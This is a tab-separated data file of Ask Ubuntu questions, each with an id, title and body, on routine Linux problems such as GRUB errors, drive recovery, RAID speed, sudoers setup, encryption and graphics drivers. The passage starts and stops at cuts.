13:10:29 joe-laptop kernel : [ 104324.761702 ] usb 2-2.2 : configuration # 1 chosen from 1 choice dec 29 13:10:29 joe-laptop kernel : [ 104324.762700 ] scsi8 : scsi emulation for usb mass storage devices dec 29 13:10:29 joe-laptop kernel : [ 104324.762935 ] usb-storage : device found at 17 dec 29 13:10:29 joe-laptop kernel : [ 104324.762938 ] usb-storage : waiting for device to settle before scanning dec 29 13:10:34 joe-laptop kernel : [ 104329.760521 ] usb-storage : device scan complete dec 29 13:10:34 joe-laptop kernel : [ 104329.761344 ] scsi 8:0:0:0 : cd-rom teac cd-224e 1.7a pq : 0 ansi : 0 ccs dec 29 13:10:34 joe-laptop kernel : [ 104329.767425 ] sr1 : scsi3-mmc drive : 24x/24x cd/rw xa/form2 cdda tray dec 29 13:10:34 joe-laptop kernel : [ 104329.767612 ] sr 8:0:0:0 : attached scsi cd-rom sr1 dec 29 13:10:34 joe-laptop kernel : [ 104329.767720 ] sr 8:0:0:0 : attached scsi generic sg2 type 5 dec 29 13:10:34 joe-laptop kernel : [ 104330.141060 ] sr 8:0:0:0 : [ sr1 ] result : hostbyte=did_ok driverbyte=driver_sense dec 29 13:10:34 joe-laptop kernel : [ 104330.141069 ] sr 8:0:0:0 : [ sr1 ] sense key : illegal request [ current ] dec 29 13:10:34 joe-laptop kernel : [ 104330.141077 ] info fld=0x0 , ili dec 29 13:10:34 joe-laptop kernel : [ 104330.141081 ] sr 8:0:0:0 : [ sr1 ] add . sense : illegal mode for this track dec 29 13:10:34 joe-laptop kernel : [ 104330.141090 ] sr 8:0:0:0 : [ sr1 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 02 00 dec 29 13:10:34 joe-laptop kernel : [ 104330.141106 ] end_request : i/o error , dev sr1 , sector 0 dec 29 13:10:34 joe-laptop kernel : [ 104330.141113 ] __ratelimit : 18 callbacks suppressed there was more output than this ( the number of lines started growing after the drive was plugged back in , and kept growing ) , but this is the first few lines .
19281	how to close ports / disable services ?	i just portscanned my system with nmap and got the following result : port state service 25/tcp open smtp 631/tcp open ipp what are these services and how i do disable them ? probably i do n't need them .
19286	how to access usb in virtualbox running windows xp as guest os	i have installed virtual box : host os ubuntu 10.10 - guest os windows xp . no problem so far.how can i access usb devices ( scaners , printer , and others ) from the guest os , windows xp.if this is not possible in the open source version maybe there is another virtualisation software program .
19290	wubi problem : when boot `` no wubir ''	after re-installing ubuntu via wubi i now get `` no wubir '' and then directs me to a menu where i have to select which mode i want . ubuntu is fine and wubi sees no problem . what do i do ?
19291	is there an ftp client ( gui ) that will let me search for text inside files ?	i 've inherited a huge joomla website ( hundreds of nested folders and thousands of files . ) i need to be able to find a specific piece of code , but have no idea which file it 's in . is there a gui ftp client that has an integrated grep-type function ?
19292	create secure working environment on usb stick	i want to create an usb stick which contains an ubuntu installation that : can be used as a working environment ( covered in : how do i install ubuntu to a usb key ? ) - ie the ubuntu installation on the stick must provide an accessible home folder . is completely encrypted . i intend to use it as a secure environment to work on sensitive customer data - and also need the system on the stick to be able to connect to the internet . how do i realize the complete usb stick encryption ? i am also very thankfull for any further articles and ideas on this topic !
19293	grub boot error after ubuntu update	i 've installed ubuntu 10.04 with dual boot to windows xp . i put it on auto-update . it was updating grub and after a restart all it says is ; error : no such device : < hex number > with a grub rescue prompt . i 'm in panic mode right now as it 's my mother 's office computer and it might have some serious repercussions for her tomorrow . what should i do ? update : it appears that the partition structure has been corrupted since it only displays ( hd0 ) on ls
19296	automatic desktop/work environment setup	i have this strange thing i am trying to do , so before i jump into it i was curious if someone knows about existing solution or maybe have an advice as far as implementation . i run a small software company and as it happens i often do very different type of work . when i do coding for java project i need eclipse running and maybe vm with something like activemq server or whatever , plus terminals to tail -f log files specific to the application , etc . when i do something like weekly progress review with my team i need a few browser windows open and a gedit to take notes and so on . depending on the type of work i am doing i generally have all of the related apps open in multiple different workspaces . so in the example above eclipse would be open in workspace 1 , terminals would be sharing workspace 2 and so on . what i am trying to do is to automate opening of all these applications , positinoning them on the screen and assigning them to proper workspaces . my current idea consists of having a shell script that launches specific apps depending on what type of work i am about to start doing . is there anything to aid this type of automation ? or is my only option is just a shell scripting at this point ? my current system is ubuntu 10.04
19297	how to recover data from a failing hard drive ?	an external 3½ '' hdd seems to be in danger of failing — it 's making ticking sounds when idle . i 've acquired a replacement drive , and want to know the best strategy to get the data off of the dubious drive with the best chance of saving as much as possible . there are some directories that are more important than others . however , i 'm guessing that picking and choosing directories is going to reduce my chances of saving the whole thing . i would also have to mount it , dump a file listing , and then unmount it in order to be able to effectively prioritize directories . adding in the fact that it 's time-consuming to do this , i 'm leaning away from this approach . i 've considered just using dd , but i 'm not sure how it would handle read errors or other problems that might prevent only certain parts of the data from being rescued , or which could be overcome with some retries , but not so many that they endanger other parts of the drive from being saved . i guess ideally it would do a single pass to get as much as possible and then go back to retry anything that was missed due to errors . is it possible that copying more slowly — e.g . pausing every x mb/gb — would be better than just running the operation full tilt , for example to avoid any overheating issues ? for the `` where is your backup '' crowd : this actually is my backup drive , but it also contains some non-critical and bulky stuff , like music , that are n't backups , i.e . are n't backed up . the drive has not exhibited any clear signs of failure other than this somewhat ominous sound . i did have to fsck a few errors recently — orphaned inodes , incorrect free blocks/inodes counts , inode bitmap differences , zero dtime on deleted inodes ; about 20 errors in all . the filesystem of the partition is ext3 .
19300	laptop not syncing with ubuntu one	i have a desktop running maverick , and a laptop running lucid . both are supposed to be linked to my ubuntu one account . the desktop syncs fine , but when i started the laptop for the first time in a couple of months , it would n't sync any more . the ubuntu one preferences window either reports `` synchronisation complete '' even though no recent files have been downloaded nor have any test files created in the relevant synced folder been uploaded , or it says `` synchronisation in progress '' , which does not appear to be happening as it stays like this for ages and the lights on my router suggest no traffic is going through . have repeatedly tried disconnecting and reconnecting , and removing the device from the account then reattaching it , all to no avail .
19305	how to fix missing menus in non ubuntu maverick apps	there 's a bug with the menue of filezilla : when opening filezilla there is no menu list . very inconvenient because you ca n't open the `` settings '' -dialog . there are several workarounds that i tried - none of them really work . change theme while filezilla is running , menu reapperars . once you close and reopen it the menu is gone again . add `` export ubuntu_menuproxy=0 '' '' to .bashrc or just call it before starting filezilla . does n't have any effect for me - menu still missing . tried `` sudo apt-get remove appmenu-gtk '' cause it 's obviously to do with unity but the funny thing is even this method has no effect at all ! how can i fix this ? how to do the troubleshooting ? thx for reading , : p .
19306	is there a way to find out which package was responsible for a dependecypackageinstallation ?	is there a way to find out from which package-installation a certain package was installed as dependency ?
19313	how do i get a matching theme when i run a program as root ?	i use a metacity theme in my ubuntu installation . unfortunately it is n't activated for programs with gui that are started as root user and some other other certain programs like gufw ( when i start gufw by commandline not as root ) ? it uses an old not very eyecandy theme . for example for gufw is gives the following output on commandline : /usr/share/themes/finery/gtk-2.0/gtkrc:365 : error : unexpected number `0 ' , expected number ( float ) /usr/share/themes/finery/gtk-2.0/gtkrc:365 : error : unexpected number `0 ' , expected number ( float ) what could be the reason , is there a way how to enable this theme also for these programs ?
19317	how do i enable a user to sudo without password ?	i have a php script with this : < ? php # echo exec ( 'whoami ' ) ; $ output = shell_exec ( 'bash /usr/local/svn/bash_repo/make-live ' ) ; echo `` $ output '' ; ? > the make-live script contains this : # ! /bin/bash cd /var/www-cake sudo svn checkout file : ///usr/local/svn/bash_repo/repo/ echo `` head revision has been pushed to live server '' so the php user who is www-data needs to have nopasswd for that script . i am told i need to add : www-data all=nopasswd : /usr/local/svn/bash_repo/make-live to sudoers to allow this . first i run sudo visudo but i have no experience with vi so i try to open it in gedit with export editor=gedit & & sudo -e visudo which then just opens a sudoers.tmp file which is empty . i add the line and save it . but it does n't do save . so i just try sudo visudo and i add the line right beneath this part : # user privilege specification root all= ( all ) all www-data all=nopasswd : /usr/local/svn/bash_repo/make-live i closed out sudoers and reopened to verify that it has saved . i even restart apache . i run the php file and it still does n't work . what am i missing ?
19320	how to enable or disable services ?	i read about how to enable and disable services in ubuntu and it seems that there are different possibilities to manage them . the first method i found is update-rc.d to add new services to startup , which aims on the /etc/init.d folder and its contents . the other one i found is to edit .conf files in the /etc/init folder . what 's the recommended way to enable / disable / add services and why ? could you please give a short bulletproof step by step example on how to add a service in ubuntu and enable and disable it ?
19322	how to convert rmvb to mp4 ? ( or , why ffmpeg does n't work ? )	i 'm trying to use this script to convert an rmvb video to mp4 , but i 'm having problems with the ffmpeg . in apt-get there 's only ffmpeg0 and ffmpeg-dev , i installed both , but the script does n't work , it 's saying that ffmpeg was not found . any hint on this ? -- update the script i 'm talking about : # ! /bin/bash tipo= $ 1 arqv= $ 2 resolucao= $ 3 tipoarq= $ 4 help ( ) { clear echo `` convertor de vídeos para mp4 '' echo `` parametro 1 = tipo : ( a - arquivo/d - diretório ) '' echo `` parametro 2 = arquivo/caminho '' echo `` parametro 3 = resolução '' echo `` parametro 4 = tipo de arquivos de entrada ( rmvb , avi , mpeg ) '' } if [ `` $ tipo '' = `` '' -o `` $ arqv '' = `` '' -o `` $ resolucao '' = `` '' -o `` $ tipoarq '' = `` '' ] ; then help ; exit fi if [ `` $ tipo '' = `` d '' ] ; then count=`ls `` $ arqv '' /*. $ tipoarq | wc -l` else count=1 fi echo `` $ count arquivos encontrados para converter . '' x=0 while [ ! $ x -ge $ count ] ; do x=`echo $ x + 1 | bc` if [ `` $ tipo '' = `` d '' ] ; then nome=`ls `` $ arqv '' /*. $ tipoarq | head -n $ x | tail -n 1` else nome= $ arqv fi echo `` convertendo $ nome ... '' ffmpeg -i `` $ nome '' -acodec libfaac -ab 128kb -vcodec mpeg4 -b 1200kb -mbd 2 -cmp 2 -subcmp 2 -s $ resolucao `` `echo $ nome | sed `` s/\. $ tipoarq//g '' ` '' .mp4 done exit -- update using winff it gives : unknown encoder 'libx264' i 've installed both the existing packages libx264-67 and libx264-dev , but none solved . looking for more alternatives ...
19323	nautilus wo n't browse my usb hard drive unless i double click it twice	on my laptop , running 10.10 , whenever i plug in a thumb drive nautilus will add an icon on the desktop and open a file manager window with the drive contents . this does not work for my 250mb external hard drive : the icon is added on the desktop , but no file manager window pops up . double clicking on the icon just causes some disk activity ( on the system drive ) and nothing else . double clicking another time on the icon the file manager eventually opens . at first i thought this was related to nautilus-elementary , but after removing nothing has changed . how do i even start debugging this ? update : suggestions below got me curious , so i `` safely removed '' the drive , unplugged it and plugged it in again . this time it would open on the first double click ( no automagic file manager window yet , anyway ) . doing a quick `` mount '' in a terminal shows my usb drive is mounted as a fuseblock device . i suspect the first ineffective double click could be used to load/start the whole user space filesystem thingie . update : from what i can see after a fresh boot the hard disk is mounted as soon as the icon appears on the desktop , the only thing that does n't work is double-clicking the first time . right-clicking the drive and chosing `` open '' always works the first time , seems like `` open '' is not the default double-click action for external drives ... update : looks like there are a couple of bugs that could be related : external fat32 hard drive takes excessive time to open in nautilus nautilus fails to open external hard drive before open folder
19325	improving mdadm raid-6 write speed	i have a mdadm raid-6 in my home server of 5x1tb wd green hdds . read speed is more than enough - 268 mb/s in dd . but write speed is just 37.1 mb/s . ( both tested via dd on 48gb file , ram size is 1gb , block size used in testing is 8kb ) could you please suggest why write speed is so low and is there any ways to improve it ? cpu usage during writing is just 25 % ( i.e . half of 1 core of opteron 165 ) no business critical data there & server is ups-backed . mdstat is : personalities : [ raid6 ] [ raid5 ] [ raid4 ] md0 : active raid6 sda1 [ 0 ] sdd1 [ 4 ] sde1 [ 3 ] sdf1 [ 2 ] sdb1 [ 1 ] 2929683456 blocks super 1.2 level 6 , 1024k chunk , algorithm 2 [ 5/5 ] [ uuuuu ] bitmap : 0/8 pages [ 0kb ] , 65536kb chunk unused devices : < none > any suggestions ? things like writeback , barrier , nobh did n't helped . dd blocksize=1m , 8m did n't changed anything . it looks like mdadm physically reads sectors to calculate parity even if it does not matter ... is that correct ? update : speed degradation after altered stripe cache was actually because 1 hdd probably failed during testing , nice : -d resolved : after increasing stripe cache & switching to external bitmap , my speeds are 160 mb/s writes , 260 mb/s reads . : -d
19327	is it possible to pay the ubuntu one storage with paypal ?	i just wanted to purchase 20gb of space for my ubuntu one account . but i have no creditcard , just a paypal account and online-banking . what can i do now ? will it be possible to pay through paypal ? i mean , in the ubuntu one music store paypal is accepted ... hmm .
19330	no entry for / in /etc/fstab	i ca n't find an entry for mounting `` / '' in /etc/fstab ( i was hoping to set commit value to something big because my hdd is pretty slow ) : [ ... /fest ] $ cat /etc/fstab # unconfigured fstab for base system /dev/sda3 /media/megahard ntfs-3g defaults , locale=en_us.utf-8 0 0 /mnt/2gb.swap none swap sw 0 0 [ ... /fest ] $ cat /etc/issue ubuntu 10.10 \n \l netbook remix , installed with chroot from wubi ( it 's not wubi , it 's just installed from it )
19334	web developing- strange happenings	as i 'm teaching myself php and mysql during break , i 'm experimenting coding in a ubuntu virtual machine where apache , mysql and php have been installed and configured to a shared folder . i 'm not a big fan of kompozer because the source code layout is a pia , so i 've started checking out gphpedit . however , since using it , i 've come across two issues : when i edit the .html and .php files , sometimes the file extension will change to .html~ and .php~ , becoming invisible to the browser . the only solution is to switch to windows , right click and rename the file extension . in ubuntu firefox , when i click on my prpject 's submit button for in a practice form , a dialog box pops up asking what firefox should do with the .php file , rather than simply displaying it in the browser . when i do this in windows chrome & firefox , it goes right to the response page . i 'm not sure if this behavior is limited to gphpedit/kompozer , but i 've never noticed this happening in dreamweaver . any solutions ? edit 1 the behavior in point 1 occurs both when dreamweaver is open in windows accessing the same files and when it is not . i changed the extension filename of welcome.php , added a comment in gphpedit , and the file changed to welcome.php~ upon saving . edit 2 using geany in place of kompozer/gphpedit has solved this problem . point 2 behavior is resolved after closing then restarting firefox .
19335	how to activate webgl in chromium beta ?	does anyone succeeded in activating webgl in chromium beta in ubuntu 10.04 ? i 've tried everything at http : //khronos.org/webgl/wiki/getting_a_webgl_implementation but i still ca n't use http : //bodybrowser.googlelabs.com/
19345	how do i count the clicks of the mouse buttons ?	how do i count the clicks of the mouse buttons since the start of ubuntu ? i would like to do mouse button clicks stats so i need it . thanks
19346	how to block internet access for wine applications ?	is it possible to prevent specific wine applications or any wine application from accessing the internet ? when using certain apps under windows , they were trying to access the internet from time to time without any obvious reason . i was able to prevent that behaviour with a personal firewall back then . unfortunately i did not find an application level firewall in ubuntu up to now . this is especially annoying when i am abroad using data-roaming with my 3g modem . is there a way to prevent my wine-apps sending or receiving data without my knowledge . thanks in advance ! ysn
19354	what is the proper way to windows 7/ubuntu 10.10 dual-triple boot partitioning for laptop oem ?	hi linux community , i find my self struggling with the slowness of windows os once again . it 's time to change with the ubuntu 10.10 64bit for i like to use a faster operating system . my hard disk laptop has a recovery and hp_tools partition they are both primary . i have the system recovery dvd for windows 64bit should anything bad happen . here 's the layout i used with windows before : * ( c : ) windows 7 system partition ntfs - 284,89gb ( primary , ad boot , pagefile , dump ) * hp_tools system partition fat32 - 99mb ( primary ) * ( d : ) recovery partition ntfs - 12,90gb ( primary ) * system partition ntfs 199mb ( primary ) here 's the layout i wanted to make : * ( c : ) windows 7 system partition ntfs - 60gb ( primary ) ( sda1 ) * ( d : ) windows data partition ( user files ) ntfs - 120gb ( primary ) ( sda2 ) ; wan na share with linux * linux root ext4 - 10gb ( extended ) ( sda3 ) ( ubuntu 10.10 64bit ) * linux home ext3 - 90gb ( extended ) ( sda4 ) ( ubuntu 10.10 64bit ) * linux swap swap- ram size , 3gb ( sda5 ) * linux root ext3- 18gb ( extended ) ( sda6 ) ( opensuse or puppy or kubuntu ) here is my new ubuntu 10.10 64bit layout in use now : * system partition ntfs 199mb ( primary ) ( sda1 ) * ( c : ) windows 7 system partition ntfs - 90gb ( primary ) ( sda2 ) * ( d : ) windows 7 recovery partition ntfs - 12,90gb ( primary ) ( sda3 ) * linux system partition extended - 195,1gb ( logical ) * linux root ext4- 10gb ( extended ) ( sda4 ) * linux swap swap- ramx2 size , 6,1gb ( sda5 ) * linux home ext3- 179gb ( extended ) ( sda6 ) when i installed ubuntu , i did n't know if i could wipe all previous partitions , because of the recovery partition . so i just made the space for my extended partition with gparted by deleting the hp_tools ( fat32 ) . by doing this i managed somehow to install ubuntu 64 with success . and i also made the partitions for the swap or a third linux os as jordan suggested . but i could n't actually make the partitions for the shared ntfs . ( no option ! ) question 1 : what is the proper way to windows 7/ubuntu 10.10 dual-triple boot partitioning for laptop oem ? ? thank you in advance for your advises and suggestions and happy new year to all ! !
19355	mouse running amok	while using my mouse , it will all of a sudden take off and might run to calendar or/and trash . it opened calendar , then went down and opened trash up several times . it started out just doing it once in awhile with opening something and i did n't move it there . it did on it 's own . is someone controlling my computer ? that 's how it acts . i would like to get this straighted out . if it is my mouse just going berserk then i will install a new one . if it is something else , i 'd like to know what could be causing it . i have my security set so no one can access my computer . please can anyone help ?
19356	how to diagnose usb issue	so my kern.log and syslog files filled up with tons of the below messages : [ 514971.000109 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x30c4 with error -108 . i was curious as to the steps to take , commands to run , places to look to help diagnose this issue ( and curious as to what caused it ) ? i 'm guessing it 's something usb elated . i had some issues with my printer earlier today so this might be related . thanks , alex
19357	can not enable firefox `` submit crash report '' option	inside firefox , i try to check the box in edit- > preferences- > advanced- > general which says submit crash report , but each time i close the browser and open it again it remains unchecked . what could be wrong ?
19359	lost /boot partition	recently i installed windows xp on my machine where i had only ubuntu . the problem is that i had my /boot on a separate , 200 mb partition at beginning of the hard-disk ( the leftmost ) . installing windows , it said that it ca n't write mbr because there 's an unknown partition , so i formatted that partition as ntfs , and i could finally get windows installed . now i want to restore that partition so i can use my linux keeping both systems . now should i install grub2 there , or it 's ok by restoring partition data ? if the first is the correct answer then provide me a little tutorial on installing it . keep in mind that there was my /boot folder .
19361	ca n't access ubuntu 's shared folders from windows 7	in ubuntu maverick , i 've shared some folders using the nautilus `` sharing options '' gui . i can see them from windows 7 , but when i try to access them ( from windows ) it asks for a username and password . no matter what i enter , it wo n't let me in . how do i configure this to share normally ? update : i 've found that some of the shared folders let me in , but others do n't . of the ones that do , some of their subfolders do , others do n't , etc . how can i investigate what 's causing this ? when i let the gui install what it needs , it installs samba and libpam-smbpass . on the machine i am having trouble connecting to , libpam-smbpass is not installed . could this be the problem ?
19370	gnome alternatives / equivalent for klipper ?	anyone has any tool , other than a pen and pencil to help me manage more than 5 `` copy-pastes '' ? i heard of glipper , but anymore , with a small description and pros/cons would be appreciated . thanks .
19371	recommended installation for asus eee 1015pem netbook	i just got my asus eee pc 1015pem netbook with windows 7 starter ... obviously , i 'd like to install ubuntu ( not sure yet if i 'd like to dual boot or completely remove win7 ) . anyway , i never had a netbook before . i know about unity but heard some bad stuff about it , so i wonder if i might be better sticking to the desktop edition . what do you think ? any recommendations ? also , should i use the 32 bit or 64 bit version ?
19376	installing ubuntu on a ssd	going to install ubuntu 10.10 on new intel x25m 80gb ssd . it will be fresh install . i have been googling for past few days and getting overwhelming articles/blogs/q & as . one particularly very useful being : how do i optimize the os for ssds ? but with so many suggestions and differences of opinions ( on different links ) this simple os install process seems to be daunting task to me and i really want to stick with ubuntu ( although have used for very short period of time ) . can someone help me by answering few questions ( yes , they are repeated because i could n't comprehend the answers elsewhere ) which file system ( ext2/3/4 or something else ) ? ( consider ssd life ) can it be changed after installation ? should i partition the disk ? ( as we do in traditional hdd ) for now , no plan of dual booting . only ubuntu will live on scarce space of 80gb ssd . i have 2 gb ram , should i still allocate swap space ( if i do n't allocate swap space , can i still hibernate the machine ) ? will swap space impact ssd life ? should i consider putting additional 1gb ram to avoid swap space ? what is partition aligning ? is it needed to be done before installing the ubuntu os or can be done later ? intended usage - heavy browsing , programming , regular video/music and some other non-cpu/ram-intensive programs . will keep big files in an external hard drive . laptop config - 3yr old vaio , core2 duo , 2gb ram more references : http : //opentechnow.blogspot.com/2010/02/linux-ssd-optimization-guide.html is a 40gb ssd practical to use for ' / ' http : //ubuntuforums.org/archive/index.php/t-1145332.html https : //help.ubuntu.com/community/swapfaq http : //ubuntuforums.org/showthread.php ? t=1242740 ( resizing/creating does not seem a simple process after look this ) http : //en.dogeno.us/2010/01/karmic-with-solid-state-disk-how-to-optimize-ubuntu-for-ssd/ how to enable trim ?
19377	ubuntu ( and any other linux os ) not booting from cd or usb	i will tell you the whole story , one night when i was using kde on ubuntu 10.10 kwin crashed then i shut down the os next day when i booted it the display came completely garbled and i went to safe graphics mode , it worked and in reinstalled the nvidia drivers and then restarted .then immediatly , it said no init found busybox xx.xx then i thought ill do a fresh install i inserted the ubuntu cd provided to me by canonical.when i pressed 'try ubuntu without installing ' instead of the graphic boot screen i saw.ubuntu 10.10 in regular text and a progress bar few seconds after that the screen was flooded with error messages first alot of white then red.i then went to my win7 installation and saw a website which told me to find a ext3 reader and format the ubuntu partition and the swap.i did that and when i restarted . grub configuration not found grub > then it took my win 7 erd and restored 7 's bootloder xp and 7 were working i put in the livecd again , same error , now usin my seven , please help geeks , ive even tried knoppix , fedora , debiane.t.c they wont boot and i want to retain my win 7 and winxp partitions , i really miss linux . edit http : //www.youtube.com/watch ? v=qsxnko6959s youtube video of problem
19380	brightness control not working on hp pavilion dm3t ( intel gma 4500mhd )	i picked up an hp dm3t laptop with intel hd graphics and installed ubuntu 10.10 64 bit on it . it works great -- the only problem is that the brightness controls on the keyboard do n't work . the brightness is always at full . when i try to adjust it down , the indicator graphic indicates that it 's going down but the actual brightness does n't change . is there anything that i can try to make this work ? i 'd really appreciate any help . i asked this on superuser.com and someone commented that i should play around with the intel hd drivers . i 'm a total noob -- how do i do that ? what else can i try ? i really do n't want to go back to windows .
19384	guide to installing a fully encrypted file system ?	i have a little netbook on which i want to install ubuntu 10.10 ( 32-bit ) on . however , since it is a portable pc i want to completely encrypt the file system ( in case of theft ) . currently it runs windows 7 starter and i use truecrypt which installs a custom boot loader that asks for the password . i remember from the past that linux can do that as well by putting /boot on it 's own , unencrypted partition . since it 's been ages since i last worked with file system encryption ( i remember setting up lvm and a custom patched grub to ask for the password ) i wonder how that would work nowadays and if there is a step-by-step how-to for it ?
19389	what 's the meaning of `` -pae '' at the end of kernel version ?	last time i installed ubuntu there was a `` -pae '' at the end of the kernel version in the boot screen . now that i 've reinstalled ubuntu from the same disk instead of `` -pae '' there is a `` -generic '' at the end of kernel version . what 's the meaning of those terms ? why do they different between two installations ?
19393	adding a dir to the path for my account everywhere	i want to append the directory /home/bart/bin to my path . by my path , i mean that it should be available whenever i login , whether it be via the terminal , gnome , kde or ssh , but not for other users . what 's the recommended way of doing this ?
19396	run the system configuration once the system has been installed	the problem is the following . i have an old computer that mounts a sata dvd burner . the old mobo ( an asrock p4vt8+ ) is not able to recognize the freaking burner when booting . so i had to convert my ide hd to usb hd and mount it on my laptop and install ubuntu from there . the problem now is that i 'm obviously getting kernel panic every now and then so i was wondering if it is possibile to rerun only the system and the hardware configuration . update : i 'm getting kernel panics once i moved the ide hd back .
19397	is there a command to close a terminal window via commandline ?	is there a command to close a terminal window via commandline ?
19400	my name no longer appears on gnome-panel	i booted up my laptop this morning to find my name no longer appears beside the power off button in the top right hand corner of the top gnome panel : i tried deleting and re-adding the indicator applet session to the panel but it still does n't display my name . any suggestions ?
19410	u1 music shows unknown artist , how can i make it recognize m4a files ?	i am in the process of uploading my music library as a backup to u1 , but i figured , why not also enjoy ubuntu 1 music on my iphone ? with a few difficulties to start , the upload is now in progress , but i 've noticed that there is a huge percentage of files in the unknown artist folder , and i believe it is all of my m4a files . they play fine , but without any information . coming from an itunes background , and having bought the majority of my music on the itunes store , i wonder how i could make this work , easily ? i am on maverick ( afaik ) , but about ubuntu shows 11.04 . i use banshee as my music manager , and i monitor my sync using ubuntu one preferences , ubuntuone-indicator and magicicada . the total file size of my music folder is 38.9gb . thank you for your help ! ! and apologies if i could n't find a thread where this was already covered ... edit : the maverick/11.04 issue is a known bug , and i 've seen it here : why does documentation tell me i am running 11.04 when it is 10.10 ? if you 'd rather not want to wait for the m4a support , you can help yourself out using soundconverter . i followed the instructions here : how do i convert music between formats and keep its metadata ? it has taken ages , but so far i am happy with the results ... note that you will need to install mp3 support in soundcoverter , i stumbled accross it and install was very straighforward ! oh , and it does only convert m4a 's that are not password protected , which i 'm guessing will be mostly m4p anyway .
19413	how can i expand a partition into non adjacent free space using gparted ?	my dual-boot machine has partitions as follows : sda1 50 gb ntfs sda2 15 gb unallocated sda3 20 gb ext3 sda4 20 gb ext4 i would like to allocate the unused space on sda2 to my ubuntu partition on sda4 , hopefully leaving the other two partitions untouched , leaving this configuration : sda1 50 gb ntfs sda3 20 gb ext3 sda4 35 gb ext4 is this possible ? if so , how can it be done , preferably using gparted ?
19420	how can i force brasero to keep my mp3 playlist order of songs when i burn it ?	i have an mp3 playlist in rhythmbox . when i drag and drop it in a brasero data project the order of songs is lost . in fact their sorted in alhpabetical order . as you can imagine this is awful for a list of songs you want to listen to a particular order . this does not happen when i burn a list as audio and not data project .
19422	pin request at each login after update to maverick	i have a netbook with included 3g mobile broadband card ( huawei e620 ) . i have configured the broadband network connection in the network manager and it works perfectly . however since maverick upgrade , a window appears just after login i asking for the simcard pin . this happens every time i log in and did not happen with lucid . note that the pin is stored in the configuration of the mobile broadband connection and lucid was satisfied with that . is there a way to prevent this request or , at least , to have the system rember the pin and stop ansking for it ? if it may be useful , the broadband network connection is configured as not being available for other users . also , i would like to keep the simcard asking for the pin ; only i do not want to insert it manually at login .
19425	mount ntfs partition with german umlaute	how can i mount a ntfs partition , which has german umlaute ( ä , ö , ü ) in the filenames . i 'm using the following mount command : mount -t ntfs-3g uuid=5a9098309098149b /local/data -olocale=de_de.utf-8
19430	mount a virtualbox drive image ( vdi ) ?	is it possible to mount a virtualbox drive image ( .vdi ) so the contents can be viewed in nautilus etc. ? i have a windows 2000 .vdi which wo n't boot ( `` inaccessible boot device '' ) after upgrading from virtualbox 2.x to 3.1.6 . i believe the ide drive details have changed and that all i need to do is access the internal drive image and edit the windows boot.ini to point to the new location .
19437	how do i build mysql server ( 5.5.8 is current latest )	how do i build mysql server ? i was hoping for ./configure ; make ; make install but it doesnt seem to be that easy . basically i want the default settings ( as you would get on the distro or even in windows ) and doing this to get a newer version ( 5.0 to 5.5 ) .
19438	shareware in ubuntu repositories ? ( rar )	i thought that all applications in ubuntu repositories are free , but today i wanted to install rar package and its description says , that this is shareware and i could use it ( without registration ) only 40 days . are there more packages like rar ? how can i find the licence of programs in repositories ?
19441	internet connection through bluetooth pan profile ?	is there any guide to get internet connection through bluetooth pan profile in ubuntu ? i am using ubuntu 9.04 .
19442	what is the `` waiting channel '' of a process ?	in the gnome system monitor 's processes tab there is a `` waiting channel '' column . by far the most common values i see here is poll_schedule_timeout , but i also see other values : 0 , do_exit , do_wait , futex_wait_queue_me , pipe_wait , __skb_recv_datagram and unix_stream_data_wait . so what does this `` waiting channel '' column mean ? and perhaps what do some of those values in it mean ?
19445	how to get back the brightness-notification when changing brightness via hotkeys ?	some ubuntu-versions ago , there was a popup that showed up while changing the brightness on my asus v6v with fn+key . it has been gone since ( i guess ) 9.04 . when changing the audio-volume , i still have such a thing . how can i get this back/working again ?
19448	set up multiple intranet sites	my ubuntu machine is on the network accessible at \\linux-server i have apache2 installed and if i go to http : //linux-server it takes me to /var/www as the root directory . is it possible on the same machine to set it up so that http : //jisaacks points to /var/www-jisaacks
19454	netbook partitioning scheme suggestions	i got a new asus eee pc 1015pem with 2gb ram and a 250gb hd . after playing with the netbook edition a little , i would like to install the desktop edition i 'm used to . in addition to ubuntu partition ( s ) , i would like to have one separate partition for data ( documents , music , etc . ) , so i could try other oss in the future without losing the data . what partition scheme would you recommend ? i usually like to let the installation do it by itself , but when i try to that i can only use the entire disk , so i do n't get the desired data partition . i wish there was a way to see the recommended default partitioning scheme , then just tweak it a bit to fit your needs ( instead of building one from scratch ) . so , how would you recommend i partition my hd ? please be specific since i never manually partitioned before . thanks !
19455	using capitals in my username ?	during installation of ubuntu 10.04 i was not allowed to use capitals in my username . is there any way i could change this ?
19457	ca n't set 1280x1024 with nvidia geforce 8400 gs	i 've just installed 10.04 lts using the windows installer . the system hangs during boot ; the splash screen is frozen and it accepts neither ctrl+alt+f2 nor ctrl+alt+del , only a hard reset . ( i 'm a linux noob . ) when i edit the default grub boot option to omit quiet splash , it gets to the point saying * setting sensors limit [ ok ] _ and there it stays . i can only get to the desktop using the grub recovery boot option , of course with a lower resolution ( 800x600 ) but everything else seems to work fine . as i said , this is a new install . the only thing i 've done is to use the update manager to get everything up to date , and activate the newest nvidia driver using the `` hardware drivers '' window . i had a similar problem when i installed 9.04 a year ago , and at that time posted this question with an answer that worked - this does n't work with 10.04 . running nvidia-xconfig to create a new xorg.conf did n't fix it either ( while in recovery boot ) . the `` hardware drivers '' window just states nvidia accelerated graphics driver ( version current ) [ recommended ] . i tried jonathon 's tip about uninstalling the driver and removing the conf file , to see if it can reboot in the normal mode but it just came back into recovery mode . /etc/x11/xorg.conf does n't exist . update : i do n't know the exact version of the nvidia driver . the `` hardware drivers '' window just states nvidia accelerated graphics driver ( version current ) [ recommended ] . also , there is no /etc/x11/xorg.conf , but there is a xorg.conf.failsafe which does n't say much . this question mentions nvidia-96 . would that be relevant in my case ? update 2 : as per jorge 's answer , i 've now installed nvidia-glx-185 but afterward nvidia-xconfig does n't exist ( sudo : nvidia-xconfig : command not found ) . there is still no /etc/x11/xorg.conf file . however , i rebooted anyway and the normal mode ( not failsafe ) works ! now i got the desktop in 1024x768 , which is a huge improvement already . i looked for the xorg.conf after reboot and it still does n't exist . added : would this be a useful driver ? i tried downloading it but instead of a save-as dialog i got a looong page full of php or similar ... update 3 : i tried jorge 's suggestion of nvidia-glx-185 but did n't manage to get it into 1280x1024 . i then tried the version 260.19.29 linked above , but that quickly became very complicated and i ended up somehow breaking my installation ( and my windows boot as well , but i realize it 's my own fault ) . i 've now gone away from a wubi installation and i 'm writing this on a 